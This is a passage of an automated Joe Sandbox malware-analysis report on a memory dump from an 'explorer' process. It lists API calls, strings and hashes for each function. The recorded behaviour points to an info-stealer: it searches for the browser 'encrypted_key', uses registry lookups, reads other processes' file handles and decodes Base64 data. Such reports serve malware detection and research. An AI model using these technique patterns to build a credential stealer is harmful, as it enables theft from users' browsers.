                                                                                                                          • StrStrIA.SHLWAPI("encrypted_key":",029C692C,?,02973FA8), ref: 02972FDD
                                                                                                                            • Part of subcall function 0297190B: lstrlen.KERNEL32(?,?,?,?,00000000,02972783), ref: 0297192B
                                                                                                                            • Part of subcall function 0297190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,02972783), ref: 02971930
                                                                                                                            • Part of subcall function 0297190B: lstrcat.KERNEL32(00000000,?), ref: 02971946
                                                                                                                            • Part of subcall function 0297190B: lstrcat.KERNEL32(00000000,00000000), ref: 0297194A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$lstrcat
                                                                                                                          • String ID: "encrypted_key":"
                                                                                                                          • API String ID: 493641738-877455259
                                                                                                                          • Opcode ID: 148227af9989eb5a4559cd9fa5fa1a17d7cf3eccec37d478846ad5d7d4b72c71
                                                                                                                          • Instruction ID: 88f4509f6ea7bd2b0a2c8508ea349750a607a4e489af0449d9f2184d1540c142
                                                                                                                          • Opcode Fuzzy Hash: 148227af9989eb5a4559cd9fa5fa1a17d7cf3eccec37d478846ad5d7d4b72c71
                                                                                                                          • Instruction Fuzzy Hash: 85E06822F4EB246F93257BB56C44D573F4C9EC6016314007CFA02C3203DF828401C3A0
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 0297BB40
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID: winDelete
                                                                                                                          • API String ID: 3188754299-3936022152
                                                                                                                          • Opcode ID: 4bf56c927b2f0fafcf3da76535a6eeea07a534aa1edd3b1e283ef80150fd1c99
                                                                                                                          • Instruction ID: 17633e69bea3379eedd75fd3ad9307499b964dd20566c345440ad0398f8e26b4
                                                                                                                          • Opcode Fuzzy Hash: 4bf56c927b2f0fafcf3da76535a6eeea07a534aa1edd3b1e283ef80150fd1c99
                                                                                                                          • Instruction Fuzzy Hash: 0F112B32A04208EB9710AB74D861D7D777ADFD1768F10451DEC06D7288DB308901DB92
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02971011: GetProcessHeap.KERNEL32(00000000,00000000,?,02971A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2), ref: 02971020
                                                                                                                            • Part of subcall function 02971011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971027
                                                                                                                            • Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
                                                                                                                            • Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A
                                                                                                                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 02972EE4
                                                                                                                          • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02972F54
                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 02972F62
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1066184869-0
                                                                                                                          • Opcode ID: 197784292fcb590f5baf92b27710ed104f584d5b9cebf40d91f745ab6ba67fa3
                                                                                                                          • Instruction ID: ae3a932bb63578105be882b43219032986750858e3bceaf8b5504ee090c9231b
                                                                                                                          • Opcode Fuzzy Hash: 197784292fcb590f5baf92b27710ed104f584d5b9cebf40d91f745ab6ba67fa3
                                                                                                                          • Instruction Fuzzy Hash: 96016D31608250AB8719AF22DC04DBFBBAEEFC5350F00482DF859A2150DB358855EFA1
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitInitializeProcessUninitialize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4175140541-0
                                                                                                                          • Opcode ID: a124c0422c002de6bb91e072841d114a148b91cc100de969eda28187a2c765e8
                                                                                                                          • Instruction ID: 8dc06b43198e24353171b80f197de2926d60d3d2c9d0ed5834315d39fdedb898
                                                                                                                          • Opcode Fuzzy Hash: a124c0422c002de6bb91e072841d114a148b91cc100de969eda28187a2c765e8
                                                                                                                          • Instruction Fuzzy Hash: 2CC09B35BCC1004BE7803BF15C0D72D363CAF85713F205804F205C5085DB5054108B27
                                                                                                                          APIs
                                                                                                                          • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 02979FF8
                                                                                                                          Strings
                                                                                                                          • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 0297A00E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateHeap
                                                                                                                          • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                                                                                          • API String ID: 10892065-982776804
                                                                                                                          • Opcode ID: 65ee505431fcc51eb946997e34903bf08127695f8340688c782b2ae3d6bc08fc
                                                                                                                          • Instruction ID: 3859ab2e1103a946b4d8bc710ea542e30badcaca25f1f0aa7f7b5a2152ab1535
                                                                                                                          • Opcode Fuzzy Hash: 65ee505431fcc51eb946997e34903bf08127695f8340688c782b2ae3d6bc08fc
                                                                                                                          • Instruction Fuzzy Hash: 72F09673B49341BAF7305A94AC84F7B679DD7CA795F104C29F946D6180E3716C408670
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
                                                                                                                            • Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A
                                                                                                                          • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,02972E83,PathToExe,00000000,00000000), ref: 02971B16
                                                                                                                            • Part of subcall function 02971011: GetProcessHeap.KERNEL32(00000000,00000000,?,02971A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2), ref: 02971020
                                                                                                                            • Part of subcall function 02971011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971027
                                                                                                                            • Part of subcall function 029719E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971A1E
                                                                                                                            • Part of subcall function 029719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02971A3C
                                                                                                                            • Part of subcall function 029719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02971A75
                                                                                                                            • Part of subcall function 029719E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971A98
                                                                                                                          Strings
                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 02971B40
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                          • API String ID: 2162223993-2036018995
                                                                                                                          • Opcode ID: efee3d14f04a60defe8eb8e7fdb03a219f27d93f34813207758da20fc36522ef
                                                                                                                          • Instruction ID: 7a8eec509d5dabebd0e3120d41d7dd170647ead91627da984509bead7fb2a535
                                                                                                                          • Opcode Fuzzy Hash: efee3d14f04a60defe8eb8e7fdb03a219f27d93f34813207758da20fc36522ef
                                                                                                                          • Instruction Fuzzy Hash: ACF0E93774064867D711792EDC80E7B379FCBC22A6316002DF41DA3255EE23AC016674
                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 0297A35F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointer
                                                                                                                          • String ID: winSeekFile
                                                                                                                          • API String ID: 973152223-3168307952
                                                                                                                          • Opcode ID: 42a4373da6a2620ad732c6c65a0990c2d8dd776401f7a8d90e63ca98f8c5fef9
                                                                                                                          • Instruction ID: 92911f36db42592ce3aa6cf3d3521690da479a93e6187a1ad7276aebb851f0bb
                                                                                                                          • Opcode Fuzzy Hash: 42a4373da6a2620ad732c6c65a0990c2d8dd776401f7a8d90e63ca98f8c5fef9
                                                                                                                          • Instruction Fuzzy Hash: E2F0B431A15204AFE7119F65DC009BB77AEEB45321B10876AF865C62C0DB70DD509AA1
                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(04C40000,00000000,?), ref: 02979EB5
                                                                                                                          Strings
                                                                                                                          • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 02979ECD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                                                                                          • API String ID: 1279760036-667713680
                                                                                                                          • Opcode ID: 605da4d5e4f62818a09a45f6004d1047eb3e760fce0d143a43129db8bb201c0b
                                                                                                                          • Instruction ID: b18bcc6f0af28baf1c237dc6884d9b05b9ac6a730937e81f3953be745b759e46
                                                                                                                          • Opcode Fuzzy Hash: 605da4d5e4f62818a09a45f6004d1047eb3e760fce0d143a43129db8bb201c0b
                                                                                                                          • Instruction Fuzzy Hash: 97E0C273E882107BE6122684AC04F7FF769DBD4F10F010415FA04E7251C33098A1ABF2
                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(04C40000,00000000,?), ref: 02979EF8
                                                                                                                          Strings
                                                                                                                          • failed to HeapFree block %p (%lu), heap=%p, xrefs: 02979F0E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                                                                                          • API String ID: 3298025750-4030396798
                                                                                                                          • Opcode ID: ddba24ba13be8061e88dae7cfb92811c987972a2c4130f18a935476ca4917395
                                                                                                                          • Instruction ID: 88f8d04f183fa0d4af05bc6f41fa84b947c8699443291eb8abd780957e4ca42e
                                                                                                                          • Opcode Fuzzy Hash: ddba24ba13be8061e88dae7cfb92811c987972a2c4130f18a935476ca4917395
                                                                                                                          • Instruction Fuzzy Hash: B8D01273A8C20177E7015A94AC05F3BB77D9BD5B04F450829F505D6066D36054A1BB72
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02972893,00000000,00000000,00000000,?), ref: 02971B82
                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 02971B8F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateFileHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3498533004-0
                                                                                                                          • Opcode ID: 4adcb63b914fe2da99a9cd29f1737159bc6fefd4dd4277b7237f1026002d941e
                                                                                                                          • Instruction ID: f792b0b6ef9e1b0d25a545afa439bacbda5044d1e72d6d7424ec5fa8b442ceb9
                                                                                                                          • Opcode Fuzzy Hash: 4adcb63b914fe2da99a9cd29f1737159bc6fefd4dd4277b7237f1026002d941e
                                                                                                                          • Instruction Fuzzy Hash: 12D01271657630A3D575563A7C0CEB76F1CEF435B9B140A18B41DE50C4E314889781E0
                                                                                                                          APIs
                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0297100A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$AllocateProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1357844191-0
                                                                                                                          • Opcode ID: e3cd1e359f4fd2caa5772a41b5ce35e61201f8ae0651a1347714f4646171b716
                                                                                                                          • Instruction ID: 0d3b46f57dac02d6b89e7e38052dfbc2e2f992e22e5a03dbcdd6d9fc9235b8f5
                                                                                                                          • Opcode Fuzzy Hash: e3cd1e359f4fd2caa5772a41b5ce35e61201f8ae0651a1347714f4646171b716
                                                                                                                          • Instruction Fuzzy Hash: C9A002B5D941045FDD4457A59A0DA3A391CFBC5703F204944714586141D96454148731
                                                                                                                          APIs
                                                                                                                          • RtlZeroMemory.NTDLL(?,00000018), ref: 029712B5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryZero
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 816449071-0
                                                                                                                          • Opcode ID: 9215ba4536a6b33574ff223c8f723f6b97a9698697b7a9da27555bd32a696767
                                                                                                                          • Instruction ID: a142683e93dc5a54c75a1b060d73b680f1555bcb9f649501ee7072d01ede9acc
                                                                                                                          • Opcode Fuzzy Hash: 9215ba4536a6b33574ff223c8f723f6b97a9698697b7a9da27555bd32a696767
                                                                                                                          • Instruction Fuzzy Hash: 5311DAB5E05209AFDB10DFA5D988ABEB7BDEF48651B104429F949E7240D730DA05CB60
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesW.KERNELBASE(00000000,00000000,02972C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 02971BAA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: d33c955c56a01e1c2e7916c7f0ce2058cddf6600663b695f3f18e1f043ceca9f
                                                                                                                          • Instruction ID: aaa5c4d8f1652882f8ac40c32e11ab26993f1f6c2ce1d3c1e107414698d25104
                                                                                                                          • Opcode Fuzzy Hash: d33c955c56a01e1c2e7916c7f0ce2058cddf6600663b695f3f18e1f043ceca9f
                                                                                                                          • Instruction Fuzzy Hash: AED0A933E06430838A745A3C38048A2A3886A8057832A07B8FC2AF30C8F324CC8242D0
                                                                                                                          APIs
                                                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 02971684
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateGlobalStream
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2244384528-0
                                                                                                                          • Opcode ID: dca24fcdc79281043ddfa2cfa2f35f0c043adc0dc7d5e25a6b0dd8c84d29cd09
                                                                                                                          • Instruction ID: b875c7ffe66bf0b51c4a1a5cf217fc61c5bf77227e768a7ba01d880d8b689040
                                                                                                                          • Opcode Fuzzy Hash: dca24fcdc79281043ddfa2cfa2f35f0c043adc0dc7d5e25a6b0dd8c84d29cd09
                                                                                                                          • Instruction Fuzzy Hash: C7C08C31564231DFE7301A308C09B8636D8EF09BB2F160D2AE0C5DD0C0E2F448C0CA90
                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0297158A), ref: 02971056
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: 1e2b3fe165a567dd34bdffab384d8c4976ee422b3ed9f703356cdc64883f357f
                                                                                                                          • Instruction ID: 346dcb85d2038499fb57c90731afbce45fb7e6768c9a7e07f0bc3b6385429cfa
                                                                                                                          • Opcode Fuzzy Hash: 1e2b3fe165a567dd34bdffab384d8c4976ee422b3ed9f703356cdc64883f357f
                                                                                                                          • Instruction Fuzzy Hash: 6BA002F0BD97007AFD699763AE2FF25293C9B80F12F200644B30D7C0C055E47510852D
                                                                                                                          APIs
                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,02974A5B,?,?,00000000,?,?,?,?,02974B66,?), ref: 02971065
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1263568516-0
                                                                                                                          • Opcode ID: 5fee1cab5aff80f1a472fac60da91bfd48e21f32161ae0c04094ad40238b4bb2
                                                                                                                          • Instruction ID: 30c854fc8b68b2d570b741b40c7b7fb66134257ae2df1f8ca9640018112ad22b
                                                                                                                          • Opcode Fuzzy Hash: 5fee1cab5aff80f1a472fac60da91bfd48e21f32161ae0c04094ad40238b4bb2
                                                                                                                          • Instruction Fuzzy Hash: F9A00271ED470066EDB457205D0AF2526186781B02F3049447241A91C149A5E0548B28
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 029734C0
                                                                                                                            • Part of subcall function 029733C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 02973401
                                                                                                                          • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,029737A8), ref: 029734E9
                                                                                                                            • Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
                                                                                                                            • Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A
                                                                                                                          • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 0297351E
                                                                                                                          • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 02973541
                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 02973586
                                                                                                                          • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 0297358F
                                                                                                                          • lstrcmpiW.KERNEL32(00000000,File), ref: 029735B6
                                                                                                                          • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 029735DE
                                                                                                                          • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 029735F6
                                                                                                                          • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 02973606
                                                                                                                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0297361E
                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 02973631
                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 02973658
                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0297366B
                                                                                                                          • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 02973681
                                                                                                                          • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 029736AD
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 029736C0
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,029737A8), ref: 029736F5
                                                                                                                            • Part of subcall function 02971C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02971CC0
                                                                                                                            • Part of subcall function 02971C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02971CDA
                                                                                                                            • Part of subcall function 02971C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02971CE6
                                                                                                                          • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,029737A8), ref: 02973707
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                                                                                                          • String ID: File
                                                                                                                          • API String ID: 3915112439-749574446
                                                                                                                          • Opcode ID: 8f6fd0024ac87876eb0b57051941ba4bf714b37b28cdd75be0bc1b44355fb108
                                                                                                                          • Instruction ID: 374bd6fb0b3e9bb1b8801f11e16e54e59e801d8c6cfb43c3c46efa43d330a152
                                                                                                                          • Opcode Fuzzy Hash: 8f6fd0024ac87876eb0b57051941ba4bf714b37b28cdd75be0bc1b44355fb108
                                                                                                                          • Instruction Fuzzy Hash: 7B61AE71A48300AFD7209F21CC85B2B7BEDFBC8765F20092CF946A6290D735D9549F59
                                                                                                                          APIs
                                                                                                                          • memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 029C4502
                                                                                                                          • memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 029C475F
                                                                                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 029C4803
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                          • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                          • API String ID: 231171946-1096842476
                                                                                                                          • Opcode ID: 30b4632cb43ce7113dcf7f21af2cead72e234fee686b47e9dfc95df4a6223fe6
                                                                                                                          • Instruction ID: addc268c9a7e1c5b54495f73b3650428ff2b90f4a19a2e33902bc440a2cb48a5
                                                                                                                          • Opcode Fuzzy Hash: 30b4632cb43ce7113dcf7f21af2cead72e234fee686b47e9dfc95df4a6223fe6
                                                                                                                          • Instruction Fuzzy Hash: 33C1F470B083819BDB34DF1884A077BBBE9AF89318F24292EE8D597295D734D445CB93
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02976AAA: memset.NTDLL ref: 02976AC5
                                                                                                                          • memset.NTDLL ref: 02995F53
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset
                                                                                                                          • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                                                                          • API String ID: 2221118986-594550510
                                                                                                                          • Opcode ID: 9cc413e9bdb50417a5479107ecb248c969dad934676916e4e34a77d11a874eba
                                                                                                                          • Instruction ID: d7bb208d48197906b4b81ce3ac49f6f830bb0b8bedd5a7c950e9e3e4beb3aa6a
                                                                                                                          • Opcode Fuzzy Hash: 9cc413e9bdb50417a5479107ecb248c969dad934676916e4e34a77d11a874eba
                                                                                                                          • Instruction Fuzzy Hash: C5C16D71A047019FDB14DF29C480A2EB7EABFC8724F14892DF89597281E731E956CF92
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
                                                                                                                            • Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A
                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 02972127
                                                                                                                          • _alldiv.NTDLL(?,?,00989680,00000000), ref: 0297213A
                                                                                                                          • wsprintfA.USER32 ref: 0297214F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_19_2_2971000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                                                                                                          • String ID: %li
                                                                                                                          • API String ID: 4120667308-1021419598
                                                                                                                          • Opcode ID: 2c813fdfaf3a0f1e1011c54f532fa07aff0796e582ad34f8a850319c7386061f
                                                                                                                          • Instruction ID: dc5a842b50af01dece1ed43124738670e83de8b6b75dcf3c0a86290319386c29
                                                                                                                          • Opcode Fuzzy Hash: 2c813fdfaf3a0f1e1011c54f532fa07aff0796e582ad34f8a850319c7386061f
                                                                                                                          • Instruction Fuzzy Hash: 23E09232A4020877D7203BA89C06EBE7B6DDB80A56F104595FA04B2281D5729A2487D5
                                                                                                                          APIs
                                                                                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,02973E4B,00000000), ref: 0297124A
                                                                                                                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02971268
                                                                                                                            • Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
                                                                                                                            • Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A
                                                                                                                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02971295
                                                                                                                          Memory Dump Source
